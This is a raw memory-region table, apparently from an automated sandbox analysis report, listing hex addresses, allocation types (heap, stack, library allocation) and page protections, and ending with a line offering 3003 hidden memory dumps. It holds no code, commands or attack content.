page read and write
1CB4C890000
trusted library allocation
page read and write
7FF887C80000
trusted library allocation
page read and write
8AD000
unkown
page readonly
1AB70000
trusted library allocation
page read and write
22BF7A9A000
heap
page read and write
7FF887D00000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
1B010381000
trusted library allocation
page read and write
7FF887B66000
trusted library allocation
page execute and read and write
7FF887AAD000
trusted library allocation
page execute and read and write
1AB70000
trusted library allocation
page read and write
2408000
trusted library allocation
page read and write
1AC9E000
heap
page read and write
884000
unkown
page read and write
2490000
heap
page read and write
1AA73000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
23D229B1000
heap
page read and write
22BF7A99000
heap
page read and write
22BF85EC000
heap
page read and write
1E90000
trusted library section
page read and write
7FF8DEFB0000
unkown
page readonly
7DF431871000
unkown
page execute read
22BF7AB7000
heap
page read and write
899000
unkown
page write copy
22BF859C000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7AAB000
heap
page read and write
D2C000
heap
page read and write
2622000
heap
page read and write
7FF887A7D000
trusted library allocation
page execute and read and write
22BF7C0F000
heap
page read and write
7FF887D10000
trusted library allocation
page read and write
7FF887C90000
trusted library allocation
page read and write
7FF887C90000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
22BF851C000
heap
page read and write
1B018AE2000
heap
page read and write
1AA60000
trusted library allocation
page read and write
7FF887A5D000
trusted library allocation
page execute and read and write
1AB60000
trusted library allocation
page read and write
A48963E000
stack
page read and write
27474821000
heap
page read and write
1B600000
trusted library allocation
page read and write
1B550000
trusted library allocation
page read and write
7FF717700000
unkown
page readonly
7FF887C20000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
22BF85EC000
heap
page read and write
1CB49640000
heap
page read and write
1AB70000
trusted library allocation
page read and write
44D26FE000
stack
page read and write
311F000
stack
page read and write
22BF7C77000
heap
page read and write
23EC000
trusted library allocation
page read and write
1B470000
trusted library allocation
page read and write
22BF850F000
heap
page read and write
22BF7C09000
heap
page read and write
1ADAE000
heap
page read and write
44D2AB7000
stack
page read and write
2A5A9080000
heap
page read and write
22BF85BC000
heap
page read and write
22BF7A03000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1B783000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
1AB60000
trusted library allocation
page read and write
7FF887A64000
trusted library allocation
page read and write
1B4F0000
trusted library allocation
page read and write
7FF887A50000
trusted library allocation
page read and write
7FF887CA0000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1E879E30000
heap
page readonly
1AAF0000
trusted library allocation
page read and write
22BF7B9C000
heap
page read and write
1B790000
trusted library allocation
page read and write
5D2F000
stack
page read and write
1ADD0000
heap
page read and write
190000
heap
page read and write
1B810000
trusted library allocation
page read and write
7FF887D8C000
trusted library allocation
page read and write
A48943E000
stack
page read and write
27474C32000
heap
page read and write
22BF79F9000
heap
page read and write
1AA63000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
22BF859B000
heap
page read and write
22BF58BD000
heap
page read and write
1AA80000
trusted library allocation
page read and write
22BF8520000
heap
page read and write
22BF7C77000
heap
page read and write
5AB2BFF000
stack
page read and write
1AB60000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
2B50000
heap
page read and write
2BA0000
trusted library allocation
page read and write
1AB00000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
1B570000
trusted library allocation
page read and write
22BF7C28000
heap
page read and write
23D20ECC000
heap
page read and write
269F000
trusted library allocation
page read and write
7FF887B30000
trusted library allocation
page execute and read and write
C6B000
heap
page read and write
22BF86FA000
heap
page read and write
2FF3000
trusted library allocation
page read and write
1CB4B0D0000
heap
page execute and read and write
22BF7C38000
heap
page read and write
22BF7C48000
heap
page read and write
1B530000
trusted library allocation
page read and write
7FF887E00000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
22BF85B4000
heap
page read and write
2746C411000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
B10000
heap
page read and write
1B018A90000
heap
page read and write
22BF7AAB000
heap
page read and write
22BF85DF000
heap
page read and write
1B9C0000
trusted library allocation
page read and write
2B1D000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7A40000
heap
page read and write
1AB43000
trusted library allocation
page read and write
7FF887E66000
trusted library allocation
page read and write
1AC90000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
7FF887A8D000
trusted library allocation
page execute and read and write
22BF86FA000
heap
page read and write
2A5A9395000
heap
page read and write
22BF859B000
heap
page read and write
1AADB0C0000
heap
page read and write
44D277E000
stack
page read and write
1AB70000
trusted library allocation
page read and write
1B770000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
5AB29FC000
stack
page read and write
22BF85D4000
heap
page read and write
2693000
trusted library allocation
page read and write
22BF7AAB000
heap
page read and write
2745DE75000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1BAC0000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
24A2E653000
heap
page read and write
22BF85CC000
heap
page read and write
1B560000
trusted library allocation
page read and write
1AC9E000
heap
page read and write
7FF887D10000
trusted library allocation
page read and write
7FF887E70000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
1CB4C25F000
trusted library allocation
page read and write
1AB30000
trusted library allocation
page read and write
1AA60000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AF11000
heap
page read and write
22BF7C75000
heap
page read and write
1AB70000
trusted library allocation
page read and write
7FF887CD0000
trusted library allocation
page read and write
2746C6FD000
trusted library allocation
page read and write
22BF7AB8000
heap
page read and write
22BF85DC000
heap
page read and write
23D22ADE000
heap
page read and write
22BF7C4F000
heap
page read and write
22BF86FA000
heap
page read and write
D35000
heap
page read and write
7FF887BDA000
trusted library allocation
page read and write
7FF7178DB000
unkown
page read and write
22BF7C68000
heap
page read and write
2745AB95000
heap
page read and write
24A2C950000
heap
page read and write
28BA000
heap
page read and write
2380000
heap
page execute and read and write
22BF7C77000
heap
page read and write
1BA75000
trusted library allocation
page read and write
1AED0000
trusted library allocation
page read and write
1CB634DD000
heap
page read and write
59D2000
heap
page read and write
1B018800000
heap
page read and write
22BF7A28000
heap
page read and write
22BF7C27000
heap
page read and write
A708AFF000
stack
page read and write
2745DE16000
trusted library allocation
page read and write
1B55F000
trusted library allocation
page read and write
A48917E000
stack
page read and write
1CB636B9000
heap
page read and write
1CB49683000
trusted library allocation
page read and write
2729000
trusted library allocation
page read and write
22BF85A4000
heap
page read and write
1B4A0000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
23D20E00000
direct allocation
page execute and read and write
22BF7C77000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1A390000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
7FF887DF0000
trusted library allocation
page read and write
1B65E000
stack
page read and write
A708D79000
stack
page read and write
1AB60000
trusted library allocation
page read and write
22BF58B9000
heap
page read and write
1AE40000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7AAB000
heap
page read and write
1B470000
trusted library allocation
page read and write
7FF887D82000
trusted library allocation
page read and write
7FF782885000
direct allocation
page execute and read and write
22BF7C68000
heap
page read and write
2DB0000
heap
page execute and read and write
2745CF8D000
trusted library allocation
page read and write
1BAD0000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1B550000
trusted library section
page read and write
1AC11000
heap
page read and write
1AE90000
trusted library allocation
page read and write
1B58C000
heap
page execute and read and write
23D22F25000
heap
page read and write
7FF717701000
unkown
page execute read
22BF7E12000
heap
page read and write
22BF85D4000
heap
page read and write
550000
heap
page read and write
CB8000
heap
page read and write
23D229B0000
heap
page read and write
22BF851D000
heap
page read and write
2BDA000
heap
page read and write
D2E000
heap
page read and write
1B9F0000
trusted library allocation
page read and write
7FF7177BB000
unkown
page write copy
1AB70000
trusted library allocation
page read and write
A488DE2000
stack
page read and write
22BF7E17000
heap
page read and write
1AAC0000
trusted library allocation
page read and write
1AB63000
trusted library allocation
page read and write
1CB4D0EA000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
401000
unkown
page execute read
22BF7C68000
heap
page read and write
22BF7C0F000
heap
page read and write
2A13000
heap
page read and write
22BF7C70000
heap
page read and write
1B018C2C000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
22BF86FA000
heap
page read and write
1B7D0000
trusted library allocation
page read and write
7FF7823F0000
direct allocation
page execute and read and write
1B720000
trusted library allocation
page read and write
274747C9000
heap
page read and write
22BF85F3000
heap
page read and write
1B8D0000
trusted library allocation
page read and write
7FF887D30000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
1B56C000
trusted library allocation
page read and write
22BF7A03000
heap
page read and write
2963000
heap
page read and write
2F6C000
trusted library allocation
page read and write
7FF887EB0000
trusted library allocation
page read and write
7FF887B0C000
trusted library allocation
page execute and read and write
7FF887BD0000
trusted library allocation
page read and write
1B560000
trusted library allocation
page read and write
1AB50000
trusted library allocation
page read and write
1AE8E000
stack
page read and write
1BA63000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
2B33000
heap
page read and write
7FF887C00000
trusted library allocation
page read and write
1EAE0FE000
stack
page read and write
7FF887CC0000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
21C0000
heap
page read and write
1B550000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
7FF887B56000
trusted library allocation
page execute and read and write
1B9D0000
trusted library allocation
page read and write
22BF7A40000
heap
page read and write
22BF7AA8000
heap
page read and write
1CB4D07A000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1CB496C0000
heap
page read and write
22BF85D4000
heap
page read and write
22BF8524000
heap
page read and write
22BF7C27000
heap
page read and write
1B469000
trusted library allocation
page read and write
4AA0000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF7C75000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C70000
heap
page read and write
7FF887CC0000
trusted library allocation
page read and write
1AA60000
trusted library allocation
page read and write
A4891F9000
stack
page read and write
22BF7C68000
heap
page read and write
2078000
heap
page read and write
22BF7C48000
heap
page read and write
7FF887A94000
trusted library allocation
page read and write
1B07FE00000
heap
page read and write
22BF7A41000
heap
page read and write
22BF7C75000
heap
page read and write
22BF7C83000
heap
page read and write
22BF86FA000
heap
page read and write
1AA83000
trusted library allocation
page read and write
89D000
unkown
page write copy
1AB43000
trusted library allocation
page read and write
22BF7C3F000
heap
page read and write
22BF85F1000
heap
page read and write
1AB70000
trusted library allocation
page read and write
1B7D0000
trusted library allocation
page read and write
22BF85F3000
heap
page read and write
1E879DE0000
heap
page read and write
22BF86FA000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1B001EBB000
trusted library allocation
page read and write
22BF7A03000
heap
page read and write
22BF86FA000
heap
page read and write
22BF7A03000
heap
page read and write
7FF8DF029000
unkown
page read and write
1C8D6000
unkown
page read and write
22BF86FA000
heap
page read and write
2A29000
heap
page read and write
22BF7AB3000
heap
page read and write
22BF7C37000
heap
page read and write
A708CFE000
stack
page read and write
1AB40000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
22BF85BC000
heap
page read and write
22BF86FA000
heap
page read and write
1B640000
trusted library allocation
page read and write
22BF7AA4000
heap
page read and write
22BF85D5000
heap
page read and write
1AB73000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1BB10000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF7C48000
heap
page read and write
22BF85E4000
heap
page read and write
1B018C43000
heap
page read and write
7FF887CA0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
1AB70000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF85EC000
heap
page read and write
240A000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
1AC30000
trusted library allocation
page read and write
1ACF0000
trusted library allocation
page read and write
23FE000
trusted library allocation
page read and write
1CB49680000
trusted library allocation
page read and write
22BF7C71000
heap
page read and write
1CB4C7A5000
trusted library allocation
page read and write
1BA30000
trusted library allocation
page read and write
1AB67000
trusted library allocation
page read and write
7FF887EC0000
trusted library allocation
page read and write
1EE0000
heap
page read and write
1B800000
trusted library allocation
page read and write
2B58000
heap
page read and write
22BF86FA000
heap
page read and write
22BF8519000
heap
page read and write
1AF00000
trusted library allocation
page read and write
90000
heap
page read and write
7FF887D00000
trusted library allocation
page read and write
7FF887AF0000
trusted library allocation
page read and write
7FF887D20000
trusted library allocation
page read and write
1CB4C7A9000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
A4897BB000
stack
page read and write
A48A28B000
stack
page read and write
22BF79FB000
heap
page read and write
22BF85E4000
heap
page read and write
44D380E000
stack
page read and write
22BF7C77000
heap
page read and write
1BAE0000
trusted library allocation
page read and write
22BF856C000
heap
page read and write
2745D736000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
C21000
heap
page read and write
22BF85D4000
heap
page read and write
7FF7178DF000
unkown
page readonly
1AB43000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
1B570000
trusted library allocation
page read and write
1B07E2AD000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF5896000
heap
page read and write
7FF887A8D000
trusted library allocation
page execute and read and write
1AB60000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
22BF85EC000
heap
page read and write
22BF7C37000
heap
page read and write
1AB60000
trusted library allocation
page read and write
44D2A3F000
stack
page read and write
8AD000
unkown
page readonly
22BF7C77000
heap
page read and write
1B6DA000
stack
page read and write
22BF85CC000
heap
page read and write
7DF406970000
trusted library allocation
page execute and read and write
1CB4C8E3000
trusted library allocation
page read and write
8A9000
unkown
page readonly
7FF887CB0000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
22BF79FB000
heap
page read and write
1EF0000
heap
page read and write
22BF7C77000
heap
page read and write
2745C210000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AA67000
trusted library allocation
page read and write
2274000
heap
page read and write
22BF7AB7000
heap
page read and write
7DF431886000
unkown
page read and write
1AB43000
trusted library allocation
page read and write
1B7C0000
trusted library allocation
page read and write
22BF7C08000
heap
page read and write
22BF86FA000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF85D3000
heap
page read and write
10E0000
heap
page read and write
5959000
heap
page read and write
1CB6348E000
heap
page read and write
24A2E343000
heap
page read and write
1B520000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
1BB00000
trusted library allocation
page read and write
1B5A0000
trusted library allocation
page read and write
89D000
unkown
page write copy
1B590000
trusted library allocation
page read and write
1BBD0000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
7FF887E60000
trusted library allocation
page read and write
1B980000
trusted library allocation
page read and write
D34000
heap
page read and write
22BF7A0A000
heap
page read and write
1B591000
heap
page read and write
1AB65000
trusted library allocation
page read and write
1BC60000
trusted library allocation
page read and write
7FF887C30000
trusted library allocation
page execute and read and write
7FF887C10000
trusted library allocation
page execute and read and write
7FF887C30000
trusted library allocation
page execute and read and write
22BF85D3000
heap
page read and write
1EAE17D000
stack
page read and write
1B000150000
heap
page read and write
1B48D000
trusted library allocation
page read and write
22BF851C000
heap
page read and write
1B91D000
stack
page read and write
2DE0000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C0F000
heap
page read and write
1B520000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
2D90000
trusted library allocation
page read and write
7FF887D80000
trusted library allocation
page read and write
1B4C0000
trusted library allocation
page read and write
22BF7E38000
unkown
page read and write
1AB40000
trusted library allocation
page read and write
1B760000
trusted library allocation
page read and write
2746C717000
trusted library allocation
page read and write
1B07FE05000
heap
page read and write
1BC60000
trusted library allocation
page read and write
24A2E540000
heap
page read and write
22BF7C0F000
heap
page read and write
1AA70000
trusted library allocation
page read and write
22BF7C28000
heap
page read and write
22BF7A07000
heap
page read and write
23D22ABC000
heap
page read and write
7FF887B36000
trusted library allocation
page execute and read and write
1BA60000
trusted library allocation
page read and write
1BC60000
direct allocation
page read and write
7FF887DDC000
trusted library allocation
page read and write
7FF887A12000
trusted library allocation
page read and write
1CB496C5000
heap
page read and write
22BF85E4000
heap
page read and write
22BF7AA4000
heap
page read and write
2745C250000
heap
page read and write
1E87A1AE000
heap
page read and write
2B56000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1E87A1A0000
heap
page read and write
22BF85B4000
heap
page read and write
22BF7C77000
heap
page read and write
22BF7C68000
heap
page read and write
22BF85BC000
heap
page read and write
401000
unkown
page execute read
1BB70000
trusted library allocation
page read and write
22BF7A27000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1B4E0000
trusted library allocation
page read and write
27474CB7000
heap
page read and write
7FF887BE2000
trusted library allocation
page read and write
22BF85A4000
heap
page read and write
7FF887DB0000
trusted library allocation
page read and write
1AF0B000
stack
page read and write
5F2F000
stack
page read and write
49C0000
heap
page read and write
44D2B3A000
stack
page read and write
1B570000
trusted library allocation
page read and write
1B000020000
trusted library allocation
page read and write
7FF887D50000
trusted library allocation
page read and write
BFB000
heap
page read and write
22BF7A40000
heap
page read and write
22BF79F9000
heap
page read and write
2A5A9030000
heap
page read and write
22BF859C000
heap
page read and write
22BF8584000
heap
page read and write
1B9C0000
trusted library allocation
page read and write
22BF7A9E000
heap
page read and write
1020000
trusted library allocation
page read and write
5AB2DFF000
stack
page read and write
1E87A1AA000
heap
page read and write
331F000
stack
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF58B9000
heap
page read and write
1CB4B0C0000
heap
page read and write
1AA70000
trusted library allocation
page read and write
1ADAE000
heap
page read and write
FCE000
stack
page read and write
228A000
heap
page read and write
A4890FE000
stack
page read and write
22BF7C68000
heap
page read and write
22BF7C48000
heap
page read and write
2703000
heap
page read and write
22BF7C6A000
heap
page read and write
1B010361000
trusted library allocation
page read and write
24A2E340000
heap
page read and write
1AE20000
trusted library allocation
page read and write
A708FBE000
stack
page read and write
1AB60000
trusted library allocation
page read and write
22BF7AA0000
heap
page read and write
22BF86FA000
heap
page read and write
22BF7A2F000
heap
page read and write
1B550000
trusted library allocation
page read and write
22BF851C000
heap
page read and write
2746C6F8000
trusted library allocation
page read and write
69F000
unkown
page write copy
22BF7C83000
heap
page read and write
7FF887A3B000
trusted library allocation
page execute and read and write
22BF7C68000
heap
page read and write
22BF7C37000
heap
page read and write
2600000
heap
page read and write
22BF8584000
heap
page read and write
2B5E000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
22BF8534000
heap
page read and write
2BA0000
heap
page execute and read and write
7FF887D60000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
22BF7C1F000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C27000
heap
page read and write
7FF887C40000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
22BF85BC000
heap
page read and write
1B9A0000
trusted library allocation
page read and write
22BF7B4E000
heap
page read and write
2601000
heap
page read and write
1A3C0000
trusted library allocation
page read and write
23D20D80000
heap
page read and write
D2E000
heap
page read and write
1AC70000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C7D000
heap
page read and write
7FF887DA3000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
1AB20000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
22BF7C77000
heap
page read and write
22BF85EC000
heap
page read and write
1C580000
unkown
page read and write
1BBBA000
trusted library allocation
page read and write
1CB4C7BD000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1AC4C000
heap
page read and write
7FF887C22000
trusted library allocation
page read and write
1C580000
unkown
page read and write
2DF0000
trusted library allocation
page read and write
22BF8513000
heap
page read and write
7FF887D53000
trusted library allocation
page read and write
1AADB160000
heap
page read and write
7FF887D88000
trusted library allocation
page read and write
351F000
stack
page read and write
23D22AA1000
heap
page read and write
22BF7C6A000
heap
page read and write
2618000
heap
page read and write
2745A80B000
heap
page read and write
22BF7A03000
heap
page read and write
22BF85E4000
heap
page read and write
1AC11000
heap
page read and write
1AB10000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
597C000
heap
page read and write
22BF7C47000
heap
page read and write
22BF7C6A000
heap
page read and write
1AC18000
heap
page read and write
2745C220000
heap
page read and write
36FF000
stack
page read and write
22BF7C68000
heap
page read and write
1CB5B0E1000
trusted library allocation
page read and write
A48A20D000
stack
page read and write
7FF717700000
unkown
page readonly
22BF7A03000
heap
page read and write
22BF85CC000
heap
page read and write
1B820000
heap
page read and write
7FF887BF0000
trusted library allocation
page execute and read and write
23D229C6000
heap
page read and write
22BF86FA000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1CB6345B000
heap
page read and write
1E0F000
stack
page read and write
22BF8524000
heap
page read and write
1AB50000
trusted library allocation
page read and write
2934000
heap
page read and write
59ED000
heap
page read and write
1AB43000
trusted library allocation
page read and write
23D2100C000
unkown
page read and write
22BF7C48000
heap
page read and write
22BF7A03000
heap
page read and write
22BF79FB000
heap
page read and write
1BBA0000
trusted library allocation
page read and write
1BC00000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AB70000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
7FF887BC0000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
22BF7C83000
heap
page read and write
2B37000
heap
page read and write
22BF7C27000
heap
page read and write
22BF7C58000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
1B018705000
heap
page read and write
1BA0F000
trusted library allocation
page read and write
2742000
trusted library allocation
page read and write
1B9D0000
trusted library allocation
page read and write
7FF887ADC000
trusted library allocation
page execute and read and write
22BF7C68000
heap
page read and write
22BF8509000
heap
page read and write
7FF887BC0000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF7C70000
heap
page read and write
7DF431874000
unkown
page read and write
22BF7A2C000
heap
page read and write
7FF887E10000
trusted library allocation
page read and write
22BF8534000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
A708A7E000
stack
page read and write
59F0000
heap
page read and write
160000
heap
page read and write
1B8AD000
stack
page read and write
22BF85CC000
heap
page read and write
2415000
trusted library allocation
page read and write
1B560000
trusted library allocation
page read and write
12DB1000
trusted library allocation
page read and write
22BF8535000
heap
page read and write
22BF86FA000
heap
page read and write
22BF85EC000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2923000
heap
page read and write
22BF7C48000
heap
page read and write
1B930000
trusted library allocation
page read and write
1ACE0000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7A9B000
heap
page read and write
7C0000
heap
page read and write
22BF7A71000
heap
page read and write
22BF7C38000
heap
page read and write
1B7C0000
trusted library allocation
page read and write
7FF9080E0000
direct allocation
page execute and read and write
1AB4F000
trusted library allocation
page read and write
1AC9A000
heap
page read and write
1CB63660000
heap
page read and write
7FF887A20000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
59F3000
heap
page read and write
1ACAB000
heap
page read and write
22BF851C000
heap
page read and write
22BF79F9000
heap
page read and write
22BF85BC000
heap
page read and write
1AC9E000
heap
page read and write
1CB49410000
heap
page read and write
1CB4AF62000
heap
page read and write
1AB40000
trusted library allocation
page read and write
7FF887CE0000
trusted library allocation
page read and write
2745E31E000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF7A28000
heap
page read and write
22BF79FB000
heap
page read and write
26A9000
trusted library allocation
page read and write
7FF887A30000
trusted library allocation
page read and write
2745A80D000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C4F000
heap
page read and write
1B9E0000
trusted library allocation
page read and write
22BF7A40000
heap
page read and write
22BF85EC000
heap
page read and write
22BF79F9000
heap
page read and write
1B900000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
2745DEBC000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1B7E0000
trusted library allocation
page read and write
A4895B9000
stack
page read and write
1AB53000
trusted library allocation
page read and write
22BF7C80000
heap
page read and write
A48927E000
stack
page read and write
25A0000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
7DF470100000
trusted library allocation
page execute and read and write
1AC8C000
heap
page read and write
22BF7A03000
heap
page read and write
22BF85EC000
heap
page read and write
1CB495F0000
trusted library allocation
page read and write
1B6C0000
trusted library allocation
page read and write
A48973E000
stack
page read and write
7FF887E90000
trusted library allocation
page read and write
1BB80000
trusted library allocation
page read and write
24A2CA30000
heap
page read and write
1AF2A000
heap
page read and write
22BF7C58000
heap
page read and write
59F9000
heap
page read and write
1ACA4000
heap
page read and write
22BF7AAC000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1B34D000
stack
page read and write
1AB60000
trusted library allocation
page read and write
1E879DF0000
heap
page read and write
22BF7A06000
heap
page read and write
22BF7AB8000
heap
page read and write
22BF859C000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1CB4952E000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
7FF887B90000
trusted library allocation
page execute and read and write
1AB40000
trusted library allocation
page read and write
There are 3003 hidden memdumps, click here to show them.